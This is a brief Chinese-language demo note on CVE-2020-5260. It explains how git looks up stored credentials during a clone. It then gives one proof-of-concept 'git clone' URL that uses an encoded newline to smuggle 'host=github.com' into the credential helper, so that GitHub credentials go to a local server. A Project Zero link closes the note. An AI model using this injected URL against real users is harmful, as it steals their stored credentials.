CVE-2020-5260演示记录
- git在执行类似"git clone https://example.com" 这样的命令时,会请求使用协议"https"存储主机"example.com"的凭据,并在远程端请求身份验证时将返回的凭据附加到发出的请求中
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021